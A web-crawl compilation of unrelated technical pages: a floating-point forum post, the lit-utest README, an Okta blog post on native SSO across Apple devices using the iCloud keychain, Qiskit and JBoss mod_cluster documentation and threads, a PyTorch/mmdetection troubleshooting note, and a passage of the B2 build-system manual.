considered. (If you instead assign 0.125, there is no truncation because it has a finite digital representation that fits within the significant-digit range.) Now say you assign 0.1000000015 to a double-precision FP. This is a different story because now the 15 is part of the significant-digit range of the FP. If you square this FP, a 3 appears at a certain position determined by the place of the 15. If you instead square 0.1015, the 3 shows up again but in another position. This happens both with single and double precision. It is because 0.1015 is within the significant-digit range of both, as is the 3 in the squared result. Last edited by wolle; December 1st, 2021 at 01:24.
https://forums.codeguru.com/showthread.php?565653-Float-point-number-simple-arithmetic&s=3a2e82174c130f54134664eb3f931dfd&p=2240237
CC-MAIN-2022-21
en
refinedweb
llvm-lit module for first-class utest.h unit test support Project description llvm-lit module for first-class utest.h unit test support This module allows you to run a utest testsuite as part of a larger lit testsuite. This is useful when you want to mix API unit tests with functional testing of your driver programs. Installation pip install lit-utest Requirements lit is required. Your tests should be utest.h-based or behave like it. Usage In each of your main utest test files, set the build command: // UTEST: cc %s -o %utest_bin This works just like the built-in ShTest RUN: line, but introduces the special UTEST keyword to lit. The runner executes this command and the runs the resultant %utest_bin output file. All lit substitutions are available for use as usual. Once your build commands have been added to your unit tests, configure lit with the UTestRunner in lit.local.cfg: import lit_utest config.test_format = lit_utest.UTestRunner() lit will now expect all discovered tests in the subdirectory to behave as utest tests, and ignore those without a UTEST: build command. It runs each unit test separately using utest’s --filter switch, and collects the results and prints them in the way you’d expect lit to do: -- Testing: 3 tests, 3 threads -- XFAIL: lit_utest :: shell_tests/runline.xfail.test (1 of 3) PASS: lit_utest :: shell_tests/runline.test (2 of 3) PASS: lit_utest :: utest_tests/test.c (3 of 3) *** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestF.c2] -> PASS *** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestF.c] -> PASS *** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c/0] -> PASS *** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c/1] -> PASS *** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c2/0] -> PASS [...] For examples, see the test directory, where we eat our own dogfood. Compatibility This module should work in all places upstream lit is supported, but I will make no extra effort to support python < 2.7 Unlicence utest.h is Public Domain, llvm is either NCSA or Apache-2 license depending on the version, so it makes sense to dedicate this work to the PUBLIC DOMAIN. Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/lit-utest/
CC-MAIN-2022-21
en
refinedweb
Native on how to accomplish native SSO. Although there is no standard yet, there’s been growing demand for a solution, due to the continued expansion of native apps, both desktop and mobile. In 2020, a report from RiskIQ counted 8.9 million mobile apps. There are also a large number of internal native apps available to employees within an enterprise. In comparison with desktop or web apps, it’s even more critical to enable SSO for mobile apps, due to the smaller keyboard and screen on a mobile device, which makes password input more painful. To date, complex proprietary solutions have not proven interoperable with the variety of native applications an enterprise installs on employee devices. Thus, there is still a dire need for an industry-standard solution. Fortunately, this problem is widely recognized, and an OIDC draft spec Native SSO for Mobile Apps has been released to address the issue using a token-exchange approach. Okta recently added support for this draft spec. In this article, we describe the solution and compare it to an existing approach. We also share an example app to demonstrate how you can use the token-exchange solution to build SSO for your apps, not only within the same device, but also across devices. Specifically, the example demonstrates how you can single-sign-on with Okta to a mobile app on one device (such as your iPhone), then have access to all your apps on another desktop device (such as your Mac). Sharing web sessions with native apps Before we describe the token-exchange solution, let’s explore how to build a native SSO solution based on web SSO. If we could share web login sessions with native apps, we could leverage the advance in browser SSO technology. Web session sharing has become more restrictive due to the continued increase in privacy restrictions on mobile devices. Apple leads the charge on adding more privacy restrictions, but Android is quickly following suit. Apple introduced SFSafariViewController in iOS 9, which enables an embedded web browser experience inside a mobile app. But Apple quickly changed its behavior. In iOS 11, SFSafariViewController no longer shares any browser cookies with the standalone Safari browser on the same device, making it impossible to share SSO sessions between a mobile app and a web app. Apple introduced ASWebAuthenticationSession in iOS 12 to add the ability to share browser cookies, but it is restrictive: It can only be used in an OIDC-style login flow, and only shares persistent cookies, not session cookies. The Okta developer guide on web session sharing illustrates how two mobile apps on the same device can share a web login session. At a high level, it involves these steps: - Enable persistent cookies. Okta login session is stored in a session cookie by default, but only persistent cookies can be shared in iOS. - Login App 1 through the embedded browser. The login session is saved in a persistent cookie. - Login App 2 through the embedded browser. Since the login session is still in the persistent cookie, the user is not prompted for login. Native SSO based on token exchange Okta’s native SSO solution is based on token exchange, and it builds on an OIDC draft spec Native SSO for Mobile Apps. The following diagrams, taken from the spec, illustrate the flow to enable native SSO. Sign-in to the first application is similar to a normal OIDC sign in, using a system browser. The only difference is that we request the device_sso scope, and in return, we receive a device_secret along with the returned tokens. When Native App 2 requests login, it can simply take the ID token and device secret returned for App 1, and call the token endpoint to exchange for tokens for App 2. The returned tokens for App 2 have their own refresh lifecycle. Our Native SSO Guide goes into more detail on how to enable native SSO, and demonstrates the interaction through curl commands. How is it different The token-exchange-based native SSO solution is simpler and better than sharing web SSO in at least several regards: - Out-of-the-box config: Sharing web SSO requires you to use an API to configure all users to use a persistent cookie for session management. (The default is to use a session cookie.) A login session will persist even after you close the browser, which may be a surprise for some users. In contrast, native SSO is one of the supported grant types that can be easily enabled in the Okta admin console. - Single LogOut: It is not possible to single logout all applications with the web SSO sharing solution. If you want to log out from all apps, you have to log out from each app one by one. In contrast, in native SSO, one can simply revoke device_secret, then all apps automatically sign out. - Multiple devices: Sharing web SSO can only work on the same device. In contrast, native SSO can work across devices, as long as device_secretcan be safely shared. In fact, the remaining portion of this blog demonstrates how to implement native SSO across multiple Apple devices. Single sign-on across multiple Apple devices Many of us own multiple devices such as iPhone, MacBook, iPad. It would be great to single sign-on to apps across all the devices we own. In this section, we demonstrate how to sign into a mobile app on an iOS device and a desktop app on a MacBook by leveraging iCloud keychain. Note that this demo generalizes the device_secret concept described in the draft spec to beyond a single device. While it allows you to single sign-on across multiple devices, you do lose the ability to revoke access on an individual device. (You can only revoke all devices.) Also, you lose the assurance that the device_secret can identify a single device. We first need to create two OIDC apps in your Okta admin console, one for the iOS mobile app, another for the Mac desktop app. See our Native SSO Guide for full instruction. Next, let us start an Xcode project, and add two targets: one for an iOS app ( nativesso), another for a Mac app ( nativessomac). The full source code can be found in the Native SSO sample app repo. Store device secret in iCloud Keychain The key to enabling native SSO is to be able to securely share device_secret across multiple devices. We can use iCloud Keychain. We will show how to use Apple’s keychain interface functions to save and restore the device secret. By default, a keychain item is only stored per app. No other apps can access the keychain items your app saves. However, the keychain has a concept called the keychain access group. You can enable multiple apps to share the same keychain access group, then all of these apps can read and write from the same Keychain Access Group. A Keychain Access Group is tied to a developer account, so only your apps (if enabled) can access the group. No other apps from other developers can access your group, so it is secure. First, let us add the keychain access group. Click the target, select Signing & Capabilities, click + to add a Keychain Sharing capability. Then input a unique group name, such as com.atko.group, in the box. This will update the entitlement file. Repeat this step for other targets or apps that you want to share the device secret with. To save a device secret and ID token in the keychain, we invoke the following function: static func addDeviceSecret(idToken: String, deviceSecret: String) { let attributes: AttrAccount as String): idToken, (kSecValueData as String): deviceSecret.data(using: .utf8)! ] // Let's add the item to the Keychain! 😄 let status = SecItemAdd(attributes as CFDictionary, nil) } We first set the attributes: kSecClassis set to kSecClassGenericPasswordbecause iCloud keychain only supports password items, not certificates. kSecAttrSynchronizableflag indicates that we want to use iCloud keychain. - We add a kSecAttrLabelto facilitate a later query to find this key. kSecAttrAccessGroupis set to the same keychain access group enabled in the entitlement, for example com.atko.group. - We reuse fields designed for saving passwords: save ID token in kSecAttrAccountfield, and device secret in kSecValueData. After the attributes are set, it is a simple call to Apple’s API SecItemAdd to save the credentials. We can find the previously saved device secret through a query to the iCloud keychain through the following function. static func queryForDeviceSecret() -> (idToken: String?, deviceSecret: String?) { let query: MatchLimit as String): kSecMatchLimitOne, // should only have one key (kSecReturnAttributes as String): true, (kSecReturnData as String): true] var item: CFTypeRef? // should succeed let status = SecItemCopyMatching(query as CFDictionary, &item) if let existingItem = item as? [String: Any], let idToken = existingItem[kSecAttrAccount as String] as? String, let deviceSecretData = existingItem[kSecValueData as String] as? Data { let deviceSecret = String(data: deviceSecretData, encoding: .utf8) return (idToken, deviceSecret) } return (nil, nil) } The query is set using the same set of parameters as used in the SecItemAdd call, then it is a simple call to the Apple’s API SecItemCopyMatching. Exchange device secret for new tokens Okta OIDC iOS library is a wrapper around the AppAuth library. For token exchange, we will use AppAuth’s built-in functions. We first have to construct a configuration for AppAuth. let configuration = OIDServiceConfiguration.init( authorizationEndpoint: URL(string: authorizeUrl)!, tokenEndpoint: URL(string: tokenUrl)! ) The authorizeUrl should be set to your AS (Authorization Server)’s “authorize” URL, for instance: The tokenEndpoint should be the token url, like this: Then we construct a token exchange request. Note that we specify the new grant type urn:ietf:params:oauth:grant-type:token-exchange, and also add in the special parameters in the additionalParameters field. Specifically, actor_token should be set to the device token, and subject_token should be set to the ID token you obtained earlier when a different app signed in. let request = OIDTokenRequest( configuration: configuration, grantType: "urn:ietf:params:oauth:grant-type:token-exchange", authorizationCode: nil, redirectURL: nil, clientID: oktaOidc.configuration.clientId, clientSecret: nil, scope: "openid offline_access", refreshToken: nil, codeVerifier: nil, additionalParameters: [ "actor_token" : deviceSecret!, "actor_token_type" : "urn:x-oath:params:oauth:token-type:device-secret", "subject_token" : idToken!, "subject_token_type" : "urn:ietf:params:oauth:token-type:id_token", "audience" : "api://default"]) Lastly, we perform token exchange to get a new accessToken, refreshToken for the new app. // perform token exchange OIDAuthorizationService.perform(request) { tokenResponse, error in if error != nil { // handle errors } // Signed in, persist tokens, } End-to-end login flow Now that we have the building blocks of save-and-query device secret, and token exchange, let’s tie them together to enable login on a device. Essentially, it follows these steps: - Look up deviceSecretfrom iCloud keychain. let (idToken, deviceSecret) = queryForDeviceSecret() - If deviceSecretexists, attempts token exchange, as outlined in the previous section. - If the token exchange succeeds, the user is already logged in. We then save login state locally so that the app does not need to do a login check on the next startup. This is leveraging Okta OIDC library’s built-in capability to persist login state locally. stateManager!.writeToSecureStorage() - If no deviceSecret, or token exchange fails, invoke the OIDC login flow. First construct a configuration for Okta’s OIDC library: let configuration = try OktaOidcConfig(with: [ "issuer": " "clientId": "0oa826j5pHmPRt2n00w6", "scopes": "device_sso openid offline_access", "redirectUri": "nativesso:/callback", "logoutRedirectUri": "nativesso:/logout" ]) Then invoke the OIDC flow. On an iOS device: oktaOidc.signInWithBrowser(from: self, callback: SignInHelper.oktaOidcCallback) On a Mac: oktaOidc.signInWithBrowser(redirectServerConfiguration: nil, callback: SignInHelper.oktaOidcCallback) - If the sign-in is successful, we save the login state locally, the same as in step three. In addition, we save the device secret in the iCloud keychain, so that other apps can perform native SSO login. removeDeviceSecret() addDeviceSecret(idToken: stateManager!.idToken!, deviceSecret: stateManager!.authState.lastTokenResponse!.additionalParameters!["device_secret"]! as! String) Note that the Okta SDK currently does not understand the device secret field, so we are parsing for the field directly from the last token request response. By now, you should be able to launch both the iPhone app and the Mac app. The first one will prompt you for login, but the second one will be able to log you in without any prompt. Okta’s Native SSO is available now Okta’s native SSO feature is now in GA (general availability). You can turn it on in your org, and start experimenting. Beyond the demo use case we showed above, we envision it will open up many more scenarios. Give it a try, and drop a comment below to directly reach the development team. We would love to hear your feedback and feature requests. Want to stay up to date on the latest articles, videos, and events from the Okta DevRel team? Follow our social channels: @oktadev on Twitter, Okta for Developers on LinkedIn, Twitch, and YouTube.” Okta Developer Blog Comment Policy We welcome relevant and respectful comments. Off-topic comments may be removed.
https://developer.okta.com/blog/2021/11/12/native-sso
CC-MAIN-2022-21
en
refinedweb
MinimumEigenOptimizer¶ - class MinimumEigenOptimizer(min_eigen_solver, penalty=None)[source]¶ A wrapper for minimum eigen solvers from Qiskit Aqua. This class provides a wrapper for minimum eigen solvers from Qiskit to be used within the optimization module. It assumes a problem consisting only of binary or integer variables as well as linear equality constraints thereof. It converts such a problem into a Quadratic Unconstrained Binary Optimization (QUBO) problem by expanding integer variables into binary variables and by adding the linear equality constraints as weighted penalty terms to the objective function. The resulting QUBO is then translated into an Ising Hamiltonian whose minimal eigen vector and corresponding eigenstate correspond to the optimal solution of the original optimization problem. The provided minimum eigen solver is then used to approximate the ground state of the Hamiltonian to find a good solution for the optimization problem. Examples Outline of how to use this class: from qiskit.aqua.algorithms import QAOA from qiskit.optimization.problems import QuadraticProgram from qiskit.optimization.algorithms import MinimumEigenOptimizer problem = QuadraticProgram() # specify problem here # specify minimum eigen solver to be used, e.g., QAOA qaoa = QAOA(...) optimizer = MinimumEigenOptimizer(qaoa) result = optimizer.solve(problem) This initializer takes the minimum eigen solver to be used to approximate the ground state of the resulting Hamiltonian as well as a optional penalty factor to scale penalty terms representing linear equality constraints. If no penalty factor is provided, a default is computed during the algorithm (TODO). - Parameters min_eigen_solver ( MinimumEigensolver) – The eigen solver to find the ground state of the Hamiltonian. penalty ( Optional[ float]) – The penalty factor to be used, or Nonefor applying a default logic. Methods
https://qiskit.org/documentation/stable/0.19/stubs/qiskit.optimization.algorithms.MinimumEigenOptimizer.html
CC-MAIN-2022-21
en
refinedweb
Configuring sticky session attribute nameleaqui Jun 28, 2017 9:16 AM Hi, is it possible to configure the sticky session attribute name? I need to use a name different to JSESSIONID. I´ve tried: ProxyPass / balancer://xxxxx/ stickysession=TESTSESSIONID|testsessionid ProxyPassReverse / balancer://xxxxx/ stickysession=TESTSESSIONID|testsessionid but didn't work. Thanks in advance. Leandro 1. Re: Configuring sticky session attribute namejfclere Jul 4, 2017 11:41 AM (in response to leaqui) How are the balancer members defined? 2. Re: Configuring sticky session attribute nameleaqui Jul 4, 2017 3:38 PM (in response to jfclere) Thanks for replying Jean. We use system properties: modcluster.balancer.name = xxxxx modcluster.proxy.list = balancer.ip:port 3. Re: Configuring sticky session attribute namejfclere Jul 6, 2017 7:49 AM (in response to leaqui) try: modcluster.balancer.StickySessionCookie = xxxx 4. Re: Configuring sticky session attribute nameleaqui Jul 7, 2017 10:04 AM (in response to jfclere) It didn't work Jean. Is it possible to configure, at balancer, a cookie name for session id different than what is used in the back-end server? What I want to do is to manage the sticky session duration. So when a client doesn't make requests for a period of time, next request could go to a different server than the original, without losing its session. We have a distributable application that keeps a reference to logged user in the web session. But at login time, the web session replication isn't enough fast as requests that follow the login request. So, if, for those requests, the balancer choose a node that doesn't have been replicated yet, the user wouldn't be in session and an error occur. The solution I found is using a cookie A at backend Server, a cookie B at balancer and manage both cookies at client. A the beginning I set B=A, but when there isn't activity for a period of time, I clear B so that balancer could choose another server. Few months ago I´ve made a question load balancing - Sticky session duration - Stack Overflow and posted this solution but I couldn't make it work. Is [MODCLUSTER-477] Broken design: session cookie name should be specified on the Context level instead of the Engine level… related to this? Thanks in advance 5. Re: Configuring sticky session attribute namejfclere Jul 7, 2017 11:52 AM (in response to leaqui) Is it possible to configure, at balancer, a cookie name for session id different than what is used in the back-end server? I don't understand what you want to achieve with that... balancers aren't storing sessions nor session information so they can't know when a session is expired. MODCLUSTER-477 isn't related to your problem. 6. Re: Configuring sticky session attribute nameleaqui Jul 7, 2017 2:02 PM (in response to jfclere) I want to achieve a better load balance between back-end servers. Imagine 2 servers (X, Y) and 6 clients (A, B, C ,D ,E, F) configured with sticky session. At the beginning, A, C and E start sessions with X and B, D and F start sessions with Y. Later A, C and E end their sessions. The result is a system that is not well balanced, because Y has 3 active sessions and X doesn't have any. Some of our sessions are heavy weight and last for 8 hours, so this problem gets bigger. 7. Re: Configuring sticky session attribute nameleaqui Jul 10, 2017 1:27 PM (in response to leaqui) 8. Re: Configuring sticky session attribute namepferraro Jul 11, 2017 7:52 AM (in response to leaqui) leaqui What you are looking for is a mechanism for the servers to rebalance the sessions such that work is redistributed following a change to your server topology, and yet session stickiness is preserved. I am not sure what you hope to achieve by changing the cookie name, but, in general, load balancers do not have any knowledge of where a given session is located. This is, however, typically supported by your application server itself. WildFly's distributed session manager supports this, for one. 9. Re: Configuring sticky session attribute nameleaqui Jul 11, 2017 10:54 AM (in response to pferraro) Thanks pferraro for answering. Paul Ferraro escribió: leaqui What you are looking for is a mechanism for the servers to rebalance the sessions such that work is redistributed following a change to your server topology, and yet session stickiness is preserved. Server topology is not changed. What has changed is number of clients connected to Server X, making the cluster to be unbalanced in a "standard" sticky session scenario. I am not sure what you hope to achieve by changing the cookie name, but, in general, load balancers do not have any knowledge of where a given session is located. This is, however, typically supported by your application server itself. What I am looking for is a better load balance after the scenario of 2 servers and 6 clients I mentioned before. A way to achieve this is implementing a duration for the sticky session. So after a period of time the cluster could be balanced again. The way I found to implement sticky session duration, is that the balancer looks to another cookie (MYSESSIONID, different from JSESSIONID) so when the period of time spent, the client can clear MYSESSIONID cookie, so the balancer must assign a server following metrics configured, re-balancing the cluster. WildFly's distributed session manager supports this, for one. I am using JBoss AS 7, does Wildfly implement some mechanism for re-balance the cluster? Again, thanks for your time, Paul 10. Re: Configuring sticky session attribute nameleaqui Jul 19, 2017 3:23 PM (in response to leaqui) Finally I´ve found a way to configure the session cookie name, but I´ve needed to make some minor changes in mod_cluster-container-jbossweb. I've created a JBossWebEngine subclass: package org.jboss.modcluster.container.jbossweb; import org.apache.catalina.Engine; import org.jboss.modcluster.container.Server; import org.jboss.modcluster.container.catalina.CatalinaFactoryRegistry; public class CustomJBossWebEngine extends JBossWebEngine { private static final String CUSTOM_SESSION_COOKIE_NAME_ATT = "org.jboss.modcluster.container.jbossweb.customSessionCookieName"; private static final String CUSTOM_SESSION_PARAMETER_NAME_ATT = "org.jboss.modcluster.container.jbossweb.customSessionParameterName"; private String sessionCookieName; private String sessionParameterName; public CustomJBossWebEngine(CatalinaFactoryRegistry registry, Engine engine, Server server) { super(registry, engine, server); @Override public String getSessionCookieName() { if (this.sessionCookieName == null) { this.sessionCookieName = System.getProperty(CUSTOM_SESSION_COOKIE_NAME_ATT, super.getSessionCookieName()); return this.sessionCookieName; @Override public String getSessionParameterName() { if (this.sessionParameterName == null) { this.sessionParameterName = System.getProperty(CUSTOM_SESSION_PARAMETER_NAME_ATT, super.getSessionParameterName()); return this.sessionParameterName; And an EngineFactory implementation: package org.jboss.modcluster.container.jbossweb; import org.jboss.modcluster.container.Engine; import org.jboss.modcluster.container.Server; import org.jboss.modcluster.container.catalina.CatalinaFactoryRegistry; import org.jboss.modcluster.container.catalina.EngineFactory; public class CustomJBossWebEngineFactory implements EngineFactory { @Override public Engine createEngine(CatalinaFactoryRegistry registry, org.apache.catalina.Engine engine, Server server) { return new CustomJBossWebEngine(registry, engine, server); And modified the /META-INF/services/org.jboss.modcluster.container.catalina.EngineFactory file: org.jboss.modcluster.container.jbossweb.CustomJBossWebEngineFactory And specified the system properties: org.jboss.modcluster.container.jbossweb.customSessionCookieName=TESTID org.jboss.modcluster.container.jbossweb.customSessionParameterName=testid It would be nice if you could add this to mod_cluster.
https://developer.jboss.org/message/974115
CC-MAIN-2022-21
en
refinedweb
Environment configuration: torch 1.11.0 + CUDA 11.3 (latest) Use mmdetection to infer: from mmdet.apis import init_detector, inference_detector Errors are reported as follows: ImportError: /home/user/repos/mmdetection/mmdet/ops/dcn/deform_conv_cuda.cpython-37m-x86_64-linux-gnu.so: undefined symbol: _ZN6caffe26detail37_typeMetaDataInstance_preallocated_32E The problem has been solved. The reason for the error is that the pytorch version is too new. Although openmmlab supports the latest version, it will still cause the error. Solution: Degrade the pytorch version to torch 1.6.0 + cu102, query the official GitHub of openmmlab, uninstall and reinstall mmcv 1.3.9, and re run the mmdetection code to solve the error. Read More: - Apex install error: the environment is not compatible - Pytorch CUDA Error: UserWarning: CUDA initialization: CUDA unknown error… - Pytorch: How to Handle error warning conda.gateways.disk.delete:unlink_or_rename_to_trash(140) - [Solved] torchvision Error: UserWarning: Failed to load image Python extension: Could not find module - [Solved] RuntimeError: ProcessGroupNCCL is only supported with GPUs, no GPUs found - Pytorch directly creates a tensor on the GPU error [How to Solve] - [Solved] RuntimeError: cuda runtime error (100) : no CUDA-capable device is detected at - [Solved] bushi RuntimeError: version_ <= kMaxSupportedFileFormatVersion INTERNAL ASSERT FAILED at /pytorch/caffe2/s - [Solved] Python AssertionError: MMCV==1.1.0 is used but incompatible. Please install mmcv>=1.0.5, <=1.0.5. - [CUDA Environment] Python Pytorch Error: CudaSetupArgument - RuntimeError: CUDA error: an illegal memory access was encountered - RuntimeError: No HIP GPUs are available [How to Solve] - [Solved] RuntimeError: cublas runtime error : resource allocation failed at - [Solved] D2lzh_Pytorch Import error: importerror: DLL load failed while importing - RTX 3090 Run pytorch Error: CUDA error: no kernel image is available for execution on the device - [Solved] ERROR: No matching distribution found for torch-cluster==x.x.x - How to Solve Error: RuntimeError CUDA out of memory - [Solved] CUDA unknown error – this may be due to an incorrectly set up environment - The PIP installation package was successful but the import failed - [Solved] Tensorflow cuda Error: Could not load dynamic library ‘libcudart.so.11.0‘; dlerror: libcudart.so.11.0:
https://programmerah.com/solved-mmdetection-error-importerror-home-user-repos-mmdetection-mmdet-ops-dcn-deform_conv_cuda-cpython-37m-x-51425/
CC-MAIN-2022-21
en
refinedweb
1. Introduction Want to learn about B2 features? Start with the tutorial and continue with the overview. When you’re ready to try B2 in practice, go to the installation. Building a project with B2? See the installation and then read the overview. Setting up B2 on your project? Take a look at the overview and extender manual. If there’s anything you find unclear in this documentation, report the problem directly in the issue tracker. For more general questions, please post them to our discussion forums ( 2. Installation Unpack the release. On the command line, go to the root of the unpacked tree. Run either .\bootstrap.bat(on Windows), or ./bootstrap.sh(on other operating systems). Run $ ./b2 install --prefix=PREFIX where PREFIX is a directory where you want B2 to be installed. Optionally, add PREFIX/binto your PATH environment variable. $ PREFIX/bin/b2 A simple executable should be built. 3. Tutorial This section will guide you though the most basic features of B2. We will start with the “Hello, world” example, learn how to use libraries, and finish with testing and installing features. 3.1. Hello, world The simplest project that B2 can construct is stored in example/hello/ directory. The project is described by a file called Jamfilefile: 3.2. Properties To represent aspects of target configuration such as debug and release variants, or single- and multi-threaded builds portably, B2 uses features with associated values. For example, the debug-symbols feature can have a value of on or off. A property is just a (feature, value) pair. When a user initiates a build, B22 release inlining=off debug-symbols=on Properties on the command-line are specified with the syntax: feature-name=feature-value The release and debug that we have seen in b2 invocations are just a shorthand way to specify values of the variant feature. For example, the command above could also have been written this way: b2 variant=release inlining=off debug-symbols=on variant is so commonly-used that it has been given special status as an implicit feature—B2 will deduce its identity just from the name of one of its values. A complete description of features can be found in the section called “Features and properties”. 3.2.1. Build Requests and Target Requirements The set of properties specified on the command line constitutesfile (and its other Jamfiles, as described in the section called “Project Hierarchies”). For example, the locations of `#include`d header files are normally not specified on the command-line, but described in Jamfiles as target requirements and automatically combined with the build request for those targets. Multi-threaded2 command-line explicitly contradicts a target’s requirements, the target requirements usually override (or, in the case of “free” features like <include>, [1] augment) the build request. 3.2.2. Project Attributes. 3.3. Project Hierarchies So far we have only considered examples with one project, with one user-written Jamfile file. file in an ancestor directory. For example, in the following directory layout: top/ | +-- Jamfile | +--file has <include>/home/ghost/local in its requirements, then all of its sub-projects will have it in their requirements, too. Of course, any project can add include paths to those specified by its parents. [2] More details can be found in the section called “Projects”. Invoking b2 without explicitly specifying any targets on the command line builds the project rooted in the current directory. Building a project does not automatically cause its sub-projects to be built unless the parent project’s Jamfile explicitly requests it. In our example, top/Jamfile might contain: build-project app ; which would cause the project in top/app/ to be built whenever the project in top/ is built. However, targets in top/util/foo/ will be built only if they are needed by targets in top/ or top/app/. 3.4. Dependent Targets When building a target X that2 app optimization=full define=USE_ASM Which properties will be used to build foo? The answer is that some features are propagated — B2 the appents.file: top/Jamfile must be modified. Note that project ids are global—two Jamfiles are not allowed to assign the same project id to different directories. 3.5. Static and shared libraries Libraries can be either static, which means they are included in executable files that use them, or shared (a.k.a. dynamic), which are only referred to from executables, and must be available at run time. B222. 3.6. Conditions and alternatives>NETWORK_LIB_SHARED <variant>release:<define>EXTRA_FAST ; In the example above, whenever network is built with <link>shared, <define>NETWORK ; # (1) lib demangler : demangler_gcc.cpp : <toolset>gcc ; # (2) lib demangler : demangler_msvc.cpp : <toolset>msvc ; # (3) When building demangler, B2. 3.7. Prebuilt targetsents. If we build the release and debug versions of `app it”. 4. Overview This section will provide the information necessary to create your own projects using B2. The information provided here is relatively high-level, and the Reference as well as the on-line help system must be used to obtain low-level documentation (see B2 has two parts — a build engine with its own interpreted language, and B2 itself, implemented in that language. The chain of events when you type b2 on the command line is as follows: The B2 executable tries to find B2 modules and loads the top-level module. The exact process is described in the section called “Initialization” The top-level module loads user-defined configuration files, user-config.jam, B2 decides which targets should be built and how. That information is passed back to Boost.Jam, which takes care of actually running the scheduled build action commands. So, to be able to successfully use B2, you need to know only four things: - How to declare targets in Jamfiles How the build process works Some Basics about the Boost.Jam language. See the section called “Boost.Jam Language”. 4.1. Concepts B2 has a few unique concepts that are introduced in this section. The best way to explain the concepts is by comparison with more classical build tools. When using any flavor multi-variant builds, B2 introduces the concept of a metatarget definition main target metatarget metatarget — an object that is created when the build description is parsed and can be called later with specific build properties to generate actual targets. Consider an example: exe a : a.cpp ; When this declaration is parsed, B2 creates a metatarget, but does not yet decide what files must be created, or what commands must be used. After all build files are parsed, B2 considers the properties requested on the command line. Supposed you have invoked B2 with: b2. A build property is a variable that affects the build process. It can be specified on the command line, and is passed when calling a metatarget. While all build tools have a similar mechanism, B2 differs by requiring that all build properties are declared in advance, and providing a large set of properties with portable semantics. The final concept is property propagation. B2 B2 article. 4.2. Boost.Jam Language Thisactically, a Boost.Jam program consists of two kinds of elements—keywords (which have a special meaning to Boost.Jam) and literals. Consider this code: a = b ; which assigns the value b to the variable a. Here, a and b are literals. =and ;are keywords, $(variable) syntax. For example: operator bwhere operator is one of returns values to the caller of the rule. import module ; import module : rule ; The first form imports the specified module. All rules from that module are made available using the qualified name: module.rule. The second form imports the specified rules only, and they can be called using unqualified”. 4.3. Configuration On startup, B2 searches and reads three configuration files: site-config.jam, user-config.jam, and project-config.jam. The first one is usually installed and maintained by a system administrator, and the second is for the user to modify. You can edit the one in the top-level directory of your B2 installation or create a copy in your home directory and edit the copy. The third is used for project specific configuration. The following table explains where the files are searched. Any of these files may also be overridden on the command line. B2. For example, using gcc ; All the supported tools are documented in the section called “Builtin tools”, including the specific options they take. Some general notes that apply to most C++ compilers are below. For all the C++ compiler toolsets that B2 B2 toolsets will use that path to take additional actions required before invoking the compiler, such as calling vendor-supplied scripts to set up its required environment variables. When the compiler executables for C and C++ are different, the ; using gcc : 5 ; using clang : 3.9 ; using msvc : 14.0 ; Note that in the first call to using, the compiler found in the PATH will be used, and there is no need to explicitly specify the command. Many of toolsets have an options parameter to fine-tune the configuration. All of B2’s standard compiler toolsets accept four options cflags, cxxflags, compileflags and linkflags as options specifying flags that will be always passed to the corresponding tools. There must not be a space between the tag for the option name and the value. ; If multiple of the same type of options are needed, they can be concatenated with quotes or have multiple instances of the option tag. using gcc : 5 : : <cxxflags>"-std=c++14 -O2" ; using clang : 3.9 : : <cxxflags>-std=c++14 <cxxflags>-O2 ; Multiple variations of the same tool can be used for most tools. These are delineated by the version passed in. Because the dash '-' cannot be used here, the convention has become to use the tilde '~' to delineate variations. using gcc : 5 : g++-5 : ; # default is C++ 98 using gcc : 5~c++03 : g++-5 : <cxxflags>-std=c++03 ; # C++ 03 using gcc : 5~gnu03 : g++-5 : <cxxflags>-std=gnu++03 ; # C++ 03 with GNU using gcc : 5~c++11 : g++-5 : <cxxflags>-std=c++11 ; # C++ 11 using gcc : 5~c++14 : g++-5 : <cxxflags>-std=c++14 ; # C++ 14 These are then used as normal toolsets: b2 toolset=gcc-5 stage b2 toolset=gcc-5~c++14 stage 4.4. Invocation To invoke B2, type b2 on the command line. Three kinds of command-line tokens are accepted, in any order: - options Options start with either one or two dashes. The standard options are listed below, and each project may add additional options - properties Properties specify details of what you want to build (e.g. debug or release variant). Syntactically, all command line tokens with an equal sign in them are considered to specify properties. In the simplest form, a property looks like feature=value - target All tokens that are neither options nor properties specify what targets to build. The available targets entirely depend on the project you are building. 4.4.1. Examples: b2 toolset=gcc variant=debug optimization=space 4.4.2. Options B2 recognizes the following command line options. Invokes the online help system. This prints general information on how to use the help system with additional --help* options. --clean Cleans all targets in the current directory and in any sub-projects. Note that unlike the cleantarget in make, you can use --cleantogetheratenating the value of the --build-diroption, the project name specified in Jamroot, and the build dir specified in Jamroot (or bin, if none is specified). The option is primarily useful when building from read-only media, when you can’t modify Jamroot. --abbreviate-paths Compresses target paths by abbreviating each component. This option is useful to keep paths from becoming longer than the filesystem supports. See also the section called “Target Paths”. --hash Compresses target paths using an MD5 hash. This option is useful to keep paths from becoming longer than the filesystem supports. This option produces shorter paths than --abbreviate-pathsdoes, but at the cost of making them less understandable. See also the section called “Target Paths”. --version Prints information on the B2 and Boost.Jam versions. -a Causes all files to be rebuilt. -n Do not execute the commands, only print them. -q Stop at the first error, as opposed to continuing to build targets that don’t depend on the failed ones. -j N Run up to N commands in parallel. Default number of jobs is the number of detected available CPU threads. Note: There are circumstances when that default can be larger than the allocated cpu resources, for instance in some virtualized container installs. --config=filename Override all configuration files --site-config=filename Override the default site-config.jam --user-config=filename Override the default user-config.jam --project-config=filename Override the default project-config.jam --debug-configuration Produces debug information about the loading of B2 and toolset files. --debug-building Prints what targets are being built and with what properties. --debug-generators Produces debug output from the generator search process. Useful for debugging custom generators. -d0 Suppress all informational messages. -d N Enable cumulative debugging levels from 1 to n. Values are: + Show the actions taken for building targets, as they are executed (the default). Show "quiet" actions and display all action text, as they are executed. Show dependency analysis, and target/source timestamps/paths. Show arguments and timing of shell invocations. Show rule invocations and variable expansions. Show directory/header file/archive scans, and attempts at binding to targets. Show variable settings. Show variable fetches, variable expansions, and evaluation of '"if"' expressions. Show variable manipulation, scanner tokens, and memory usage. Show profile information for rules, both timing and memory. Show parsing progress of Jamfiles. Show graph of target dependencies. Show change target 